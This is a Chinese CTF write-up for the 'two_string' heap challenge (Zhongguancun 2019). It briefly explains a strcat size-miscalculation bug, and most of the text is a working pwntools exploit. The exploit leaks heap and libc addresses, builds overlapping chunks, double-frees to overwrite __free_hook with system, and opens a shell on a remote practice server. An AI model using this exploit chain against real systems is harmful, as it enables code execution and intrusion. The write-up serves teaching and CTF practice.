[中关村2019]two_string
首先,检查一下程序的保护机制
然后,我们用IDA分析一下,合并的时候,使用的是strcat,但是total_size的计算,没有考虑如果原size为0的情况。
在add里面,我们可以申请size为0的堆。
根据堆的性质,malloc(0)和malloc(0x10)申请的是同一个大小的chunk,假设在fastbin里有多个chunk,malloc(0)取得的chunk其fd有一个指针,没有被清空,这样strcat就可以把这个指针追加进去,从而后面的堆的内容strcat后,就溢出了。那么就可以构造overlap chunk,然后进行常规的堆利用了。
#coding:utf8
from pwn import *
#sh = process('./two_string',env={'LD_PRELOAD':'./libc-2.27.so'})
#sh = process('./two_string')
sh = remote('node3.buuoj.cn',29489)
libc = ELF('./libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
def add(size,content):
sh.sendlineafter('>>>','1')
sh.sendlineafter('string :',str(size))
sh.sendafter('string :',content)
def show(index):
sh.sendlineafter('>>>','2')
sh.sendlineafter('index :',str(index))
def delete(index):
sh.sendlineafter('>>>','3')
sh.sendlineafter('index :',str(index))
def merge_strs(seq):
sh.sendlineafter('>>>','5')
sh.sendlineafter('merged :',seq)
add(0x10,'a'*0x10) #0
add(0xF0,'b'*0xF0) #1
add(0x20,'c'*0x20) #2
delete(0)
add(0x400,'b\n') #0
add(0xF0,'c'*0xF0) #3
add(0x3F8,'d'*0x3E2 + p64(0x410 + 0x70 + 0xC0) + p64(0x100) + '\n') #4
for i in range(5,12):
add(0xF0,'e\n')
for i in range(5,12):
delete(i)
#chunk1放入unsorted bin
delete(1)
add(0,'') #1
show(1)
sh.recvuntil('Notes are : ')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
for i in range(5,8):
add(0x10,'\n')
add(0,'') #8
show(8)
sh.recvuntil('Notes are : ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
delete(0)
merge_strs('1 1 1 1 1 1 4') #0使得chunk3的size低1字节为0
#清空prev_size
for i in range(7,-1,-1):
delete(4)
add(0x3F8,'d'*0x3E2 + 'd'*i + '\n') #4
delete(0)
merge_strs('1 1 1 1 1 4') #0
#布置prev_size
delete(4)
add(0x3F8,'d'*0x3E2 + p64(0x540) + '\n') #4
delete(0)
merge_strs('1 1 1 1 1 4') #0
delete(3) #形成overlap chunk
add(0xD0,'/bin/sh\n') #3
add(0x60,'b'*0x20 + '\n') #9
#double free
delete(2)
delete(9)
add(0x60,p64(free_hook_addr) + '\n') #2
add(0x60,'a\n')
add(0x60,p64(system_addr) + '\n')
#getshell
delete(3)
sh.interactive()